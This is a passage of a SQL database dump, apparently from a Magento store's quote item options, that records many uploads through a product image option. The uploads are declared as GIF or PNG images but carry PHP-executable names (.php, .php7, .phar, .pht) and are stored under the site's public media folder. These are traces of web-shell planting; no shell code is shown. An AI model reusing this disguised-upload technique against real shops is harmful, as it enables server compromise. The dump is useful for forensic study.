(459, 447, 2062, 'info_buyRequest', '{\"options\":{\"695\":{\"type\":\"image\\/gif\",\"title\":\"695index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/9\\/695index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/9\\/695index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/9\\/695index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(460, 448, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"mw7hip1t.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/m\\/w\\/mw7hip1t.php\",\"quote_path\":\"custom_options\\/quote\\/m\\/w\\/mw7hip1t.php\",\"order_path\":\"custom_options\\/quote\\/m\\/w\\/mw7hip1t.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(461, 449, 2062, 'info_buyRequest', '{\"options\":{\"877\":{\"type\":\"image\\/gif\",\"title\":\"877index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/7\\/877index_1.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/7\\/877index_1.php\",\"order_path\":\"custom_options\\/quote\\/8\\/7\\/877index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(462, 450, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"49i4h59a.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/9\\/49i4h59a.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/9\\/49i4h59a.php\",\"order_path\":\"custom_options\\/quote\\/4\\/9\\/49i4h59a.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(463, 451, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"h7pc78c2.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/h\\/7\\/h7pc78c2.php\",\"quote_path\":\"custom_options\\/quote\\/h\\/7\\/h7pc78c2.php\",\"order_path\":\"custom_options\\/quote\\/h\\/7\\/h7pc78c2.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(464, 452, 2062, 'info_buyRequest', '{\"options\":{\"582\":{\"type\":\"image\\/gif\",\"title\":\"582index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/8\\/582index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/8\\/582index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/8\\/582index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(465, 453, 2062, 'info_buyRequest', '{\"options\":{\"995\":{\"type\":\"image\\/gif\",\"title\":\"995index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/995index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/995index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/995index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(466, 454, 2062, 'info_buyRequest', '{\"options\":{\"820\":{\"type\":\"image\\/gif\",\"title\":\"820index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/2\\/820index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/2\\/820index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/2\\/820index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(467, 455, 2062, 'info_buyRequest', '{\"options\":{\"850\":{\"type\":\"image\\/gif\",\"title\":\"850index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/5\\/850index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/5\\/850index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/5\\/850index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(468, 456, 2062, 'info_buyRequest', '{\"options\":{\"969\":{\"type\":\"image\\/gif\",\"title\":\"969index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/6\\/969index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/6\\/969index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/6\\/969index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(469, 457, 2062, 'info_buyRequest', '{\"options\":{\"948\":{\"type\":\"image\\/gif\",\"title\":\"948index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/4\\/948index_1.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/4\\/948index_1.php\",\"order_path\":\"custom_options\\/quote\\/9\\/4\\/948index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(470, 458, 2062, 'info_buyRequest', '{\"options\":{\"203\":{\"type\":\"image\\/gif\",\"title\":\"203index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/0\\/203index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/0\\/203index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/0\\/203index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(471, 459, 2059, 'info_buyRequest', '{\"options\":{\"9949630\":{\"type\":\"image\\/gif\",\"title\":\"994963index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994963index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994963index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994963index.php\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"9949631\":{\"type\":\"image\\/gif\",\"title\":\"994963index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994963index.php7\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994963index.php7\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994963index.php7\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"9949632\":{\"type\":\"image\\/gif\",\"title\":\"994963index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994963index.php8\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994963index.php8\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994963index.php8\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"9949633\":{\"type\":\"image\\/gif\",\"title\":\"994963index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994963index.phar\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994963index.phar\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994963index.phar\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"9949634\":{\"type\":\"image\\/gif\",\"title\":\"994963index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994963index.pht\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994963index.pht\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994963index.pht\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"}},\"qty\":1}'),
(472, 460, 2054, 'info_buyRequest', '{\"options\":{\"9947790\":{\"type\":\"image\\/gif\",\"title\":\"994779index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994779index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994779index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994779index.php\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"9947791\":{\"type\":\"image\\/gif\",\"title\":\"994779index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994779index.php7\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994779index.php7\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994779index.php7\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"9947792\":{\"type\":\"image\\/gif\",\"title\":\"994779index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994779index.php8\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994779index.php8\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994779index.php8\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"9947793\":{\"type\":\"image\\/gif\",\"title\":\"994779index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994779index.phar\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994779index.phar\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994779index.phar\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"9947794\":{\"type\":\"image\\/gif\",\"title\":\"994779index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994779index.pht\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994779index.pht\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994779index.pht\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"}},\"qty\":1}'),
(473, 461, 2062, 'info_buyRequest', '{\"options\":{\"9942190\":{\"type\":\"image\\/gif\",\"title\":\"994219index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994219index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994219index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994219index.php\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"9942191\":{\"type\":\"image\\/gif\",\"title\":\"994219index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994219index.php7\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994219index.php7\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994219index.php7\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"9942192\":{\"type\":\"image\\/gif\",\"title\":\"994219index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994219index.php8\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994219index.php8\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994219index.php8\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"9942193\":{\"type\":\"image\\/gif\",\"title\":\"994219index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994219index.phar\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994219index.phar\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994219index.phar\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"9942194\":{\"type\":\"image\\/gif\",\"title\":\"994219index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/994219index.pht\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/994219index.pht\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/994219index.pht\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"}},\"qty\":1}'),
(474, 462, 2062, 'info_buyRequest', '{\"options\":{\"950\":{\"type\":\"image\\/gif\",\"title\":\"950index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/5\\/950index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/5\\/950index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/5\\/950index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(475, 463, 2062, 'info_buyRequest', '{\"options\":{\"839\":{\"type\":\"image\\/gif\",\"title\":\"839index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/3\\/839index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/3\\/839index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/3\\/839index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(476, 464, 2062, 'info_buyRequest', '{\"options\":{\"187\":{\"type\":\"image\\/gif\",\"title\":\"187index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/8\\/187index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/8\\/187index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/8\\/187index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(477, 465, 2062, 'info_buyRequest', '{\"options\":{\"823\":{\"type\":\"image\\/gif\",\"title\":\"823index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/2\\/823index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/2\\/823index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/2\\/823index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(478, 466, 2062, 'info_buyRequest', '{\"options\":{\"541\":{\"type\":\"image\\/gif\",\"title\":\"541index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/541index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/541index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/541index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(479, 467, 2062, 'info_buyRequest', '{\"options\":{\"333\":{\"type\":\"image\\/gif\",\"title\":\"333index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/3\\/333index_2.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/3\\/333index_2.php\",\"order_path\":\"custom_options\\/quote\\/3\\/3\\/333index_2.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(480, 468, 2054, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/gif\",\"title\":\"fp_13341.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/f\\/p\\/fp_13341_1.php\",\"quote_path\":\"custom_options\\/quote\\/f\\/p\\/fp_13341_1.php\",\"order_path\":\"custom_options\\/quote\\/f\\/p\\/fp_13341_1.php\",\"size\":276,\"width\":16188,\"height\":26736,\"secret_key\":\"6e4dc06882d07f2c0634\"}},\"qty\":1}'),
(481, 469, 2062, 'info_buyRequest', '{\"options\":{\"122\":{\"type\":\"image\\/gif\",\"title\":\"122index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/2\\/122index_1.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/2\\/122index_1.php\",\"order_path\":\"custom_options\\/quote\\/1\\/2\\/122index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(482, 470, 2062, 'info_buyRequest', '{\"options\":{\"184\":{\"type\":\"image\\/gif\",\"title\":\"184index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/8\\/184index_1.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/8\\/184index_1.php\",\"order_path\":\"custom_options\\/quote\\/1\\/8\\/184index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(483, 471, 2062, 'info_buyRequest', '{\"options\":{\"298\":{\"type\":\"image\\/gif\",\"title\":\"298index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/298index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/298index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/298index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(484, 472, 2062, 'info_buyRequest', '{\"options\":{\"279\":{\"type\":\"image\\/gif\",\"title\":\"279index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/7\\/279index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/7\\/279index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/7\\/279index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(485, 473, 2062, 'info_buyRequest', '{\"options\":{\"818\":{\"type\":\"image\\/gif\",\"title\":\"818index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/1\\/818index_1.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/1\\/818index_1.php\",\"order_path\":\"custom_options\\/quote\\/8\\/1\\/818index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(486, 474, 2062, 'info_buyRequest', '{\"options\":{\"925\":{\"type\":\"image\\/gif\",\"title\":\"925index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/2\\/925index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/2\\/925index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/2\\/925index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(487, 475, 2062, 'info_buyRequest', '{\"options\":{\"457\":{\"type\":\"image\\/gif\",\"title\":\"457index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/5\\/457index.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/5\\/457index.php\",\"order_path\":\"custom_options\\/quote\\/4\\/5\\/457index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(488, 476, 2059, 'info_buyRequest', '{\"options\":{\"5475510\":{\"type\":\"image\\/gif\",\"title\":\"547551index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547551index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547551index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547551index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"5475511\":{\"type\":\"image\\/gif\",\"title\":\"547551index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547551index.php7\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547551index.php7\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547551index.php7\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"5475512\":{\"type\":\"image\\/gif\",\"title\":\"547551index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547551index.php8\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547551index.php8\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547551index.php8\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"5475513\":{\"type\":\"image\\/gif\",\"title\":\"547551index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547551index.phar\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547551index.phar\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547551index.phar\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"5475514\":{\"type\":\"image\\/gif\",\"title\":\"547551index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547551index.pht\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547551index.pht\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547551index.pht\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(489, 477, 2062, 'info_buyRequest', '{\"options\":{\"5472660\":{\"type\":\"image\\/gif\",\"title\":\"547266index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547266index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547266index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547266index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"5472661\":{\"type\":\"image\\/gif\",\"title\":\"547266index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547266index.php7\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547266index.php7\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547266index.php7\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"5472662\":{\"type\":\"image\\/gif\",\"title\":\"547266index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547266index.php8\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547266index.php8\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547266index.php8\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"5472663\":{\"type\":\"image\\/gif\",\"title\":\"547266index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547266index.phar\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547266index.phar\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547266index.phar\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"5472664\":{\"type\":\"image\\/gif\",\"title\":\"547266index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547266index.pht\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547266index.pht\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547266index.pht\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(490, 478, 2054, 'info_buyRequest', '{\"options\":{\"5475040\":{\"type\":\"image\\/gif\",\"title\":\"547504index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547504index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547504index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547504index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"5475041\":{\"type\":\"image\\/gif\",\"title\":\"547504index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547504index.php7\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547504index.php7\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547504index.php7\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"5475042\":{\"type\":\"image\\/gif\",\"title\":\"547504index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547504index.php8\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547504index.php8\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547504index.php8\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"5475043\":{\"type\":\"image\\/gif\",\"title\":\"547504index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547504index.phar\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547504index.phar\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547504index.phar\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"5475044\":{\"type\":\"image\\/gif\",\"title\":\"547504index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/4\\/547504index.pht\",\"quote_path\":\"custom_options\\/quote\\/5\\/4\\/547504index.pht\",\"order_path\":\"custom_options\\/quote\\/5\\/4\\/547504index.pht\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(491, 479, 2062, 'info_buyRequest', '{\"options\":{\"998\":{\"type\":\"image\\/gif\",\"title\":\"998index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/998index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/998index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/998index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
